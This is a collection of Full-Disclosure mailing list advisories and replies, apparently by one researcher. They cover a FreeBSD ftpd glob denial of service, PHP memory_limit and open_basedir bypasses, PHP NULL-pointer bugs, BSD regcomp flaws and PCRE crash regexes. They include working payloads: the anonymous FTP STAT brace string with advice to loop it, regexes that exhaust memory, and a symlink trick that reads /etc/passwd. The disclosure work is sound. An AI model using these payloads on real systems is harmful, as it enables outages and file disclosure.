Re: [Full-disclosure] Allegro.pl XSS [0-day]
XSS isn't a critical issue. CVSS2 define a standard XSS ~4.3/10, more critical are CSRF ~6.8 or Open Redirect ~5.8. It's no sense public XSS in ONE website on this list! Too many websites are vulnerable. If someone have a nice XSS in software like phpmyadmin, it could be interesting. -- Best regards, Maksymilian Arciemowicz ( http://cifrex.org/ ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegro.pl XSS [0-day]
It's not a 0day. Allegro is not a software vendor. It's a website. -- Best regards, Maksymilian Arciemowicz ( http://cvemap.org/ ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD 9.1 ftpd Remote Denial of Service
FreeBSD 9.1 ftpd Remote Denial of Service Maksymilian Arciemowicz http://cxsecurity.org/ http://cxsec.org/ Public Date: 01.02.2013 URL: http://cxsecurity.com/issue/WLB-2013020003 Affected servers: - ftp.uk.freebsd.org, - ftp.ua.freebsd.org, - ftp5.freebsd.org, - ftp5.us.freebsd.org, - ftp10.freebsd.org, - ftp3.uk.freebsd.org, - ftp7.ua.freebsd.org, - ftp2.se.freebsd.org, - ftp2.za.FreeBSD.org, - ftp2.ru.freebsd.org, - ftp2.pl.freebsd.org and more... --- 1. Description --- I have decided check BSD ftpd servers once again for wildcards. Old bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last FreeBSD version. Attacker, what may connect anonymously to FTP server, may cause CPU resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous', sending 'STAT' command with special wildchar, enought to create ftpd process with 100% CPU usage. Proof of Concept (POC): See the difference between NetBSD/libc and FreeBSD/libc. --- PoC --- #include #include int main(){ glob_t globbuf; char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}"; glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf); } --- PoC --- --- Exploit --- user anonymous pass anonymous stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b} --- /Exploit --- Result of attack: ftp 13034 0.0 0.4 10416 1944 ?? R10:48PM0:00.96 ftpd: cxsec.org anonymous/anonymous (ftpd) ftp 13035 0.0 0.4 10416 1944 ?? R10:48PM0:00.89 ftpd: cxsec.org anonymous/anonymous (ftpd) ftp 13036 0.0 0.4 10416 1944 ?? R10:48PM0:00.73 ftpd: cxsec.org anonymous/anonymous (ftpd) ftp 13046 0.0 0.4 10416 1952 ?? R10:48PM0:00.41 ftpd: cxsec.org anonymous/anonymous (ftpd) ftp 13047 0.0 0.4 10416 1960 ?? R10:48PM0:00.42 ftpd: cxsec.org anonymous/anonymous (ftpd) ... root13219 0.0 0.3 10032 1424 ?? R10:52PM0:00.00 /usr/libexec/ftpd -dDA root13225 0.0 0.3 10032 1428 ?? R10:52PM0:00.00 /usr/libexec/ftpd -dDA root13409 0.0 0.3 10032 1404 ?? R10:53PM0:00.00 /usr/libexec/ftpd -dDA root13410 0.0 0.3 10032 1404 ?? R10:53PM0:00.00 /usr/libexec/ftpd -dDA ... =>Sending: STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b} =>Result: @ps: ftp 1336 100.0 0.5 10416 2360 ?? R11:15PM 600:39.95 ftpd: 127.0.0.1: anonymous/anonym...@cxsecurity.com: \r\n (ftpd)$ @top: 1336 root1 1030 10416K 2360K RUN600:53 100.00% ftpd one request over 600m (~10h) execution time and 100% CPU usage. This issue allow to create N ftpd processes with 100% CPU usage. Just create loop while(1) and send these commands --- user anonymous pass anonymous stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b} --- NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011) http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2 The funniest is that freebsd use GLOB_LIMIT in ftpd server. http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c --- if (strpbrk(whichf, "~{[*?") != NULL) { int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE; memset(&gl, 0, sizeof(gl)); gl.gl_matchc = MAXGLOBARGS; flags |= GLOB_LIMIT; freeglob = 1; if (glob(whichf, flags, 0, &gl)) { --- but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU resource exhaustion. ;] Libc was also vulnerable in Apple and Oracle products. http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html http://support.apple.com/kb/HT4723 only FreeBSD and GNU glibc are affected --- 2. Exploit --- http://cxsecurity.com/issue/WLB-2013010233 --- 3. Fix --- Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve problem with security ;) --- 4. References --- Multiple Vendors libc/glob(3) remote ftpd resource exhaustion http://cxsecurity.com/issue/WLB-2010100135 http:
[Full-disclosure] cIFrex: How to use Regular Expressions in Research
cIFrex is a small script written in PHP, which supports search for bugs in the analysis of the source code. Using the database of filters based on regular expressions, you can quickly locating the code, in which the probability of failure is high. You will just need to have the source code on a computer with the access to cIFrex in order to be able to fully benefit from the possibilities of the new methodology. Since 2010, cIFrex has been used in my private research. Creating new filters, I have discovered a lot of bugs like Resource Exhaustion in libc, apache or vsftpd. The problem with recursion was very easy to locate. In vsftpd and libc, the PoC contained '*' char. -fnmatch()/fnmatch.c-- /* Collapse multiple stars. */ while (c == '*') -fnmatch()/fnmatch.c-- and -vsf_filename_passes_filter()/ls.c-- /* Any incoming string left means no match unless we ended on the correct * type of wildcard. */ if (str_getlen(&name_remain_str) > 0 && last_token != '*') -vsf_filename_passes_filter()/ls.c-- Many stars have been used in the demonstration of PoC for apache and vsftpd. According to intuition, where is '*' char also is a recursion. Recursion in fnmatch() and vsf_filename_passes_filter(), can be described by: V1: (?:int |char |^)(?\w+)\(.* T1: (?:if|while).*\( to see all files, where '*' was used, use T2 pattern T2: .*\'\*\'.* in result, we retrieve a list of probably vulnerable files. But you need more luck and good intuition. Remember that cIFrex: - only helps to search for the bugs - the search results does not guarantee the appearance of the susceptibilities - the more exact the regular expression, the larger probability of the appearance of the susceptibilities cIFrex may be used to catch bugs not only in C language. Using filter like: V1: (.*echo.*\$_(?:POST|GET)\[(?:\'|\")(?\w+)(?:\'|\")\].*) F1: htmlspecialchars.* F2: \(int\)\$_(?:POST|GET)\[..\] we may catch a lot of Cross Site Scripting (CWE-79) vulnerabilities. Or SQL Injection (CWE-89) using: V1: \$(?\w+) \=.*\$_(?:GET|POST)\[(?.*)\] T1: mysql_query\(.*\$ F1: addslashes.*\$ List of filters cIFrex filters are based on regular expressions, describing given kind of mistake together with the CWE identifiers http://cxsecurity.com/cifrex/filters/ Download http://cxsecurity.com/cifrex/#download Download the latest stable version of the code: http://cxsecurity.com/cifrex_download/1.1/run.txt CWE Dictionary http://cxsecurity.com/allcwe/ CVE Full Map http://cxsecurity.com/cvemap/ More about project http://cxsecurity.com/cifrex/ http://cxsecurity.com/ -- Best Regards Maksymilian Arciemowicz (CXSecurity.com) pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.4/5.3 deprecated eregi() memory_limit bypass
[ PHP 5.4/5.3 deprecated eregi() memory_limit bypass ] Author: Maksymilian Arciemowicz Website: http://cxsecurity.com/ Date: 30.03.2012 Original link: http://cxsecurity.com/issue/WLB-2012030272 PoC's: memory_limit poc http://cxsecurity.com/issue/WLB-2012030271 open_basedir poc http://cxsecurity.com/issue/WLB-2012030270 --- 1. PHP memory_limit bypass --- Functions based on POSIX Regular Expression eg. eregi, are deprecated since PHP 5.3. In last version 5.4.0 we may still use these functions. It allow us to bypass memory_limit in PHP. eregi() function based on POSIX regexp, otherwise preg_match() based on PCRE. This is the main difference between these functions. POSIX Regex Functions Tutrial http://lu.php.net/manual/en/ref.regex.php PCRE Functions Tutrial http://lu.php.net/manual/en/ref.pcre.php In last year, we have published a fix for regcomp()/libc function from NetBSD source. eregi() use the same source code what in libc of netbsd. In result, we may exhaustion memory limit or stack in PHP See our security note: Multiple BSD libc/regcomp(3) Multiple Vulnerabilities http://cxsecurity.com/research/102 Script presented below, show how to use eregi() to exhaustion memory in PHP - http://cxsecurity.com/issue/WLB-2012030271 -- http://cxsecurity.com/ cxib [ a.T] cxsecurity [ d0t] com To show memory_limit in PHP # php /www/memlimpoc.php 1 3500 PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 3501 bytes) in /var/www/memlimpoc.php on line 12 Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 3501 bytes) in /var/www/memlimpoc.php on line 12 and try this # php /www/memlimpoc.php 2 memory_limit bypassed */ ini_set("memory_limit","32M"); if($argv[1]==1) $sss=str_repeat("A",$argv[2]); elseif($argv[1]==2) eregi("(.?)(((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a"); ?> - http://cxsecurity.com/issue/WLB-2012030271 -- Remember. Don't use memory_limit as a main memory limiter. --- 2. PHP open_basedir bypass --- PHP latest version, 5.4.0 brought many changes. safe_mode has been removed but open_basedir is still available for use. We don't need look for new ways to bypass open_basedir. The problem with symlinks is still available in PHP. safe_mode tutrial http://php.net/manual/en/features.safe-mode.php PoC: 127# cat sym.php 127# php sym.php PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2 127# open_basedir will disallow /etc/passwd. Let`s see: 127# ls -la total 8 drwxr-xr-x 2 www www 512 Oct 20 00:33 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php 127# pwd /www/test 127# cat kakao.php 127# php kakao.php 127# ls -la total 12 drwxr-xr-x 4 www www 512 Oct 20 00:37 . drwxr-xr-x 13 www www 1536 Oct 20 00:26 .. drwxr-xr-x 4 www www 512 Oct 20 00:37 abc lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink 127# cat exploit # passwd # root:*:0:0:god:/root:/bin/csh ... now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't need bypass open_basedir, it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists. PoC: http://cxsecurity.com/issue/WLB-2012030270 Remember. Don't use open_basedir as a main security feature. --- 3. References --- Multiple BSD libc/regcomp(3) Multiple Vulnerabilities http://cxsecurity.com/research/102 memory_limit bypass poc http://cxsecurity.com/issue/WLB-2012030271 PHP 5.2.11/5.3.0 Multiple Vulnerabilities http://cxsecurity.com/research/70 open_basedir bypass poc http://cxs
[Full-disclosure] PHP 5.3.8 Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.3.8 Multiple vulnerabilities ] Author: Maksymilian Arciemowicz Website: http://cxsecurity.com/ Date: 14.01.2012 CVE: CVE-2011-4153 (zend_strndup) Original link: http://cxsecurity.com/research/103 [--- 1. Multiple NULL Pointer Dereference with zend_strndup() [CVE-2011-4153] ---] As we can see in zend_strndup() - -zend_alloca.c--- ZEND_API char *zend_strndup(const char *s, uint length) { char *p; p = (char *) malloc(length+1); if (UNEXPECTED(p == NULL)) { return p; <=== RETURN NULL } if (length) { memcpy(p, s, length); } p[length] = 0; return p; } - -zend_alloca.c--- zend_strndup() may return NULL in php code, many calls to zend_strndup() dosen't checks returned values. In result, places like: - -zend_builtin_functions.c--- ZEND_FUNCTION(define) { char *name; int name_len; zval *val; zval *val_free = NULL; zend_bool non_cs = 0; int case_sensitive = CONST_CS; zend_constant c; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sz|b", &name, &name_len, &val, &non_cs) == FAILURE) { return; } ... c.flags = case_sensitive; /* non persistent */ c.name = zend_strndup(name, name_len); < MAY RETURN NULL c.name_len = name_len+1; c.module_number = PHP_USER_CONSTANT; if (zend_register_constant(&c TSRMLS_CC) == SUCCESS) { RETURN_TRUE; } else { RETURN_FALSE; } } - -zend_builtin_functions.c--- - -PoC code--- [cx@82 /www]$ ulimit -a socket buffer size (bytes, -b) unlimited core file size (blocks, -c) unlimited data seg size (kbytes, -d) 524288 file size (blocks, -f) unlimited max locked memory (kbytes, -l) unlimited max memory size (kbytes, -m) 4 open files (-n) 11095 pipe size(512 bytes, -p) 1 stack size (kbytes, -s) 65536 cpu time (seconds, -t) unlimited max user processes (-u) 5547 virtual memory (kbytes, -v) 4 swap size (kbytes, -w) unlimited [cx@82 /www]$ cat define.php - -PoC code--- to see difference [cx@82 /www]$ php define.php 899 Out of memory [cx@82 /www]$ php define.php 999 Segmentation fault: 11 (gdb) bt #0 0x28745eb0 in strrchr () from /lib/libc.so.7 #1 0x0822d538 in zend_register_constant (c=0xbfbfcfb0) at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429 #2 0x08251e0e in zif_define (ht=2, return_value=0x28825a98, return_value_ptr=0x0, this_ptr=0x0, return_value_used=0) at /usr/ports/lang/php5/work/php/Zend/zend_builtin_functions.c:688 #3 0x0826dba6 in zend_do_fcall_common_helper_SPEC (execute_data=0x29401040) at zend_vm_execute.h:316 There are others places, where zend_strndup() is used: - -1-- ext/soap/php_sdl.c if (sdl->is_persistent) { new_enc->details.ns = zend_strndup(ns, ns_len); new_enc->details.type_str = strdup(new_enc->details.type_str); } else { new_enc->details.ns = estrndup(ns, ns_len); new_enc->details.type_str = estrdup(new_enc->details.type_str); } - -1-- - -2-- ext/standard/syslog.c BG(syslog_device) = zend_strndup(ident, ident_len); openlog(BG(syslog_device), option, facility); RETURN_TRUE; - -2-- - -3-- ext/standard/browscap.c } else { /* Other than true/false setting */ Z_STRVAL_P(new_property) = zend_strndup(Z_STRVAL_P(arg2), Z_STRLEN_P(arg2)); Z_STRLEN_P(new_property) = Z_STRLEN_P(arg2); } new_key = zend_strndup(Z_STRVAL_P(arg1), Z_STRLEN_P(arg1)); zend_str_tolower(new_key, Z_STRLEN_P(arg1)); zend_hash_update(Z_ARRVAL_P(current_section), new_key, Z_STRLEN_P(arg1) + 1, &new_property, sizeof(zval *), NULL); free(new_key); - -3-- - -4-- ext/oci8/oci8.c if (alloc_non_persistent) { connection = (php_oci_connection *) ecalloc(1, sizeof(php_oci_connection)); connection->hash_key = estrndup(hashed_details.c, hashed_details.len); connection->is_persistent = 0; } else { connection = (php_oci_connection *) calloc(1, sizeof(php_oci_connection)); connection->hash_key = zend_strndup(hashed_details.c, hashed_details.len);
[Full-disclosure] Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Multiple BSD libc/regcomp(3) Multiple Vulnerabilities ] Author: Maksymilian Arciemowicz http://www.netbsd.org/donations/ http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 05.10.2011 - - Pub.: 04.11.2011 CVE: CVE-2011-3336 Affected Software: - - NetBSD 5.1 (fixed) - - OpenBSD 5.0 - - FreeBSD 8.2 - - MacOSX Original URL: http://securityreason.com/achievement_securityalert/102 - --- 0.Description --- regcomp() compiles the regular expression contained in the pattern string, subject to the flags in cflags, and places the results in the regex_t structure pointed to by preg. cflags is the bitwise OR of zero or more of the following flags: REG_EXTENDED Compile modern (extended) REs, rather than the obsolete (basic) REs that are the default. REG_BASIC This is a synonym for 0, provided as a counterpart to REG_EXTENDED to improve readability. - --- 1. Multiple BSD libc/regcomp(3) Multiple Vulnerabilities --- In regcomp(3) of BSD implementation, i've discovered a several flaws. Similar problem was diagnosed one year ago in GNU libc (01.10.2010). But GNU regcomp() code is different from BSD. Recursion and bad memory managment, may admit to unexpected end of application. Together with NetBSD we have decided to fix all these flaws. Most important was limit of recursion for REG_EXTENDED and REG_BASIC, and get better control over memory usage. Specifically crafted .ftpaccess file can return result as below - -proftpd--- # telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 ProFTPD 1.3.3f Server (ProFTPD Default Installation) [127.0.0.1] user dude 331 Password required for dude pass dude and in the same time # gdb -q proftpd 15814 (no debugging symbols found) Attaching to program: /usr/local/sbin/proftpd, process 15814 Reading symbols from /usr/lib/libutil.so.11.2...done. Loaded symbols for /usr/lib/libutil.so.11.2 Reading symbols from /usr/lib/libc.so.58.0...done. Loaded symbols for /usr/lib/libc.so.58.0 Reading symbols from /usr/libexec/ld.so...done. Loaded symbols for /usr/libexec/ld.so 0x001f39e9 in select () from /usr/lib/libc.so.58.0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0026d951 in memcpy () from /usr/lib/libc.so.58.0 crash in regcomp() ... assert(finish >= start); if (len == 0) return(ret); enlarge(p, p->ssize + len); /* this many unexpected additions */ assert(p->ssize >= p->slen + len); (void)memcpy(p->strip + p->slen, p->strip + start, (size_t)len * sizeof(sop)); ... (gdb) x/i $eip 0x2d42951 : repz movsl %ds:(%esi),%es:(%edi) ... - -proftpd--- Uncontrolled memory exhaustion, allow to create an RE consuming all free memory. As we can read in manual: - -man regcomp 3-- regexec() performance is poor. This will improve with later releases. nmatch exceeding 0 is expensive; nmatch exceeding 1 is worse. regexec is largely insensitive to RE complexity except that back references are massively expensive. RE length does matter; in particular, there is a strong speed bonus for keeping RE length under about 30 characters, with most special characters counting roughly double. regcomp() implements bounded repetitions by macro expansion, which is costly in time and space if counts are large or bounded repetitions are nested. An RE like, say, `a{1,100}){1,100}){1,100}){1,100}){1,100}' will (eventually) run almost any existing machine out of swap space. - -man regcomp 3-- Using RE like `a{1,100}){1,100}){1,100}){1,100}){1,100}' may lead to out of swap space. It can be helpful to attack last stable version of proftpd. To fix memory exhaustion problem, we should create some limit of memory usage. In my opinion 128MB is optimal limit for one regcomp(3) call. Then function, checking memory usage like below - -part-of-fix-- 214: #defineMEMLIMIT0x800 215: #define MEMSIZE(p) \ 216:((p)->ncsalloc / CHAR_BIT * (p)->g->csetsize + \ 217:(p)->ncsalloc * sizeof(cset) + \ 218:(p)->ssize * sizeof(sop)) 219: #defineRECLIMIT256 - -part-of-fix-- should solve problem with memory exhaustion. In regcomp() we have a few recursion loops: - - p_ere <> p_ere_exp - - p_bre <> p_bre_exp - - repeat We need to create a limit for the two main functions p_ere and p_bre_exp #define RECLIMIT256 - -REG_EXTENTED--- 341: p_ere( 342: struct parse *p, 343: int stop, /* character this ERE should end at */ 344: size_t reclimit) 345: { ... 351: 352:_DIAGASSERT(p != NULL); 353: 354:if (reclimit++ > RECLIMIT || p->error == REG_ESPACE) { 355:p->error = REG_ESPACE; 356:return; 357:} 358: 359:for (;;) { 360:/* do a bunch of concatenated expressions */ 361:
Re: [Full-disclosure] New Opera 11.51 PoC Denial of Service (pigtail23)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 stack exhaustion. it's seems to recursion problem for basic regular expression. the same or similar problem exists in PCRE 8.12, allowing to crash multiple applications cx@cx64:/www$ cat crash0.php cx@cx64:/www$ php crash0.php Segmentation fault or some times ago for apache, 127# cat .htaccess RewriteEngine On RewriteBase /rcrash RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy 127# curl http://127.0.0.1/rcrash/gun curl: (52) Empty reply from server [Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal instruction (4) Program received signal SIGSEGV, Segmentation fault. 0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB", offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2) at pcre.c:7997 7997c = *ecode++ - OP_TYPESTAR; that is the same problem. - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJOo1mUAAoJEIO8+dzW5bUwMBwP/3M0LD5DaXzuwvT3jhmuxi+m aQ8/66efeFAYqcm8XFTx4xcinA6thDvxV05VHUN1TwJbBUY/m0IatD5WdD3gCY2/ R61fg3zmYZoKg5+aeSCJT3VSJbhQbA8pcQoDQp8BI+AdLv9D1hGu6n8qMC9xF6Lx 4ef/sqTZfsGZObKU1ualRvKa5MWT9N78r8ufDDwxEnDnk6IigrKnnRfsnQsZbboW i1hGwyJhDNI0s9HJzyT2t0sru3aGdSXXVoKlSkmtfVbhvpmT8gyIWr3xNJZQWXRP odGNXPJ4/+yKXZh5jjNZ4tFqc4ARkkpG5WxqoLOwVYucTQgcJeh61gt42cMnAnFM NNKYjhFS1IKiuW8UXWPDB6hoVySBsOArhZK7d6P/h3PsMNGVm1lixfQMX5e1JNQb 5KUu704p1ONDyzC5JWqfdGYwXE3K10sDZJ6K7n0vgEtmfGVX3WKjIybnAlnZ5CT/ 7MCo4xGKB7vuMUeZaBInKvLwr/a1LZK1MFMPcu+ypNBLJI6FWG98OsNttpRz2jRz O0dq0BNAGZR8zTYnd6JD7zTKpk9IIHoQLJjDjTDsxZrOFnLrF6FTqCwUSuTo9ldi r+T3GU0+dtBTUG34mBPxWSYlGUag6xjLlyOZDpSniSSwj8brsCKuXlOf67Hh2VHW MfKU/5PxCy6TYZjdAROB =L6P1 -END PGP SIGNATURE- 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symlink vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/22/2011 11:14 AM, full-disclosure-requ...@lists.grok.org.uk wrote: > If you had your way, would you see it implemented as /tmp/ > //tmp, or some other way? per_user_tmp=yes ? http://www.feyrer.de/NetBSD/bx/blosxom.cgi/index.front?-tags=tmp - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJOouW2AAoJEIO8+dzW5bUwz5IP/2zd8n7txMETl/t1wHvvhnXV YhyfSCSxxnYXh7Us9T/5aLFZUBykwOV03Dr9p57G7S25ETtYwPXGdcNlnhIQ8La5 7Ac3g8htqoPvX8pVKx0ZcEz2CVZwOtR32AvSkY+ulFx3q1eZC22BHj/vQ3QFa2ky AFHC/9B5l5tcyJUyAqGRYqrvP4ijhjew6aHS6A1WTlwEDNkA4hj8eKxHW7J1o3iR 14buqi2/mAN2XwYus3DniQI7LTsAp20nv60yFMuTIBZ24kzDc/XGkNw5sNzkJOnq Q6Cg4rxhLclwH91aSyrZOsrBE1irWsAQM40yMzuZ1UnlcQJv3dVln8OdnFSEpoUN DWR1iyeYOHW5tHhW9f9elj8CZQQJG/iGyfaYItGWWx0R5sHyRXfK0Dqk7V7c+Fqw 8LVj33xCwmD2ihYLWKoOWHNe1jpaZV+m9miVnNH6pAHvBspXVva5dwyidhxOgyvu e67VuHdMlpMi9HN/j+ULsjrJ92GpWwNZBVi54UxaPnUnIzA+UEyDvXRikdDNVWaK BXU+6T8uvncctv/k2ujrVJrTFEByxcWKXSUXvpVB1d3hfcJShUWyaXqKBIDYmNoL jjMhlM17D2wdIw/h0NvCopTXC+xExZAjZT423xpyhkrw8TzUN2imfd1eEYLDs/RT yN2Gr0CCVYY3J6SH0D/r =6G5i -END PGP SIGNATURE- 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.3.6 multiple null pointer dereference
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ PHP 5.3.6 multiple null pointer dereference ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://securityreason.net/ http://cxib.net/ Date: - - Dis.: 20.07.2011 - - Pub.: 19.08.2011 Affected Software (verified): PHP 5.3.6 and prior Fixed: PHP 5.3.7 Original URL: http://securityreason.com/achievement_securityalert/101 - --- 0.Description --- PHP is a general-purpose scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document. It also has evolved to include a command-line interface capability and can be used in standalone graphical applications. - --- 1. PHP 5.3.6 multiple null pointer dereference --- Some time ago we have reported list with possible NULL pointer dereferences in php 5.3.6. If user may change size of malloc, it's possible to get NULL pointer dereferences. I haven't enought time to check security impacts for all these bugs. To demonstrate these flaws, we may use default memory limit in OpenBSD [512MB]. We should allocate a lot of memory like 510MB (still 2MB free). If some string is longer than 2MB (example 4MB), and php try copy this string using malloc/strlen etc then malloc return NULL. Then program is counting with possible NULL pointer dereference or buffer overflow sympthons. Example: http://cwe.mitre.org/data/definitions/690.html where CWE-690 give CWE-476 NULL pointer dereference good example for CWE-690 is tz->location.comments = malloc(comments_len + 1); memcpy(tz->location.comments, *tzf, comments_len); This code may provide to null pointer dereference or simple crash with nulling memory with memset() in.str = malloc((e - s) + YYMAXFILL); memset(in.str, 0, (e - s) + YYMAXFILL); memcpy(in.str, s, (e - s)); Program received signal SIGSEGV, Segmentation fault. 0xbba7581c in memset () from /usr/lib/libc.so.12 (gdb) x/i $eip 0xbba7581c : rep stos %eax,%es:(%edi) (gdb) x/x $eax 0x0:Cannot access memory at address 0x0 (gdb) x/x $edi 0x0:Cannot access memory at address 0x0 In this case, memset() overwrite the memory with 0x0 char. If attacker can put something else that 0x0, it would have security impact. There are more interesting places, where user may try change size of malloc. See bellow - -id0-start- http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/curl/interface.c?view=markup 820 if (!CRYPTO_get_id_callback()) { 821 int i, c = CRYPTO_num_locks(); 822 823 php_curl_openssl_tsl = malloc(c * sizeof(MUTEX_T)); 824 825 for (i = 0; i < c; ++i) { 826 php_curl_openssl_tsl[i] = tsrm_mutex_alloc(); 827 } 828 829 CRYPTO_set_id_callback(php_curl_ssl_id); 830 CRYPTO_set_locking_callback(php_curl_ssl_lock); 831 } - -id0-end- - -id1-start- http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/date/lib/parse_date.c?view=markup 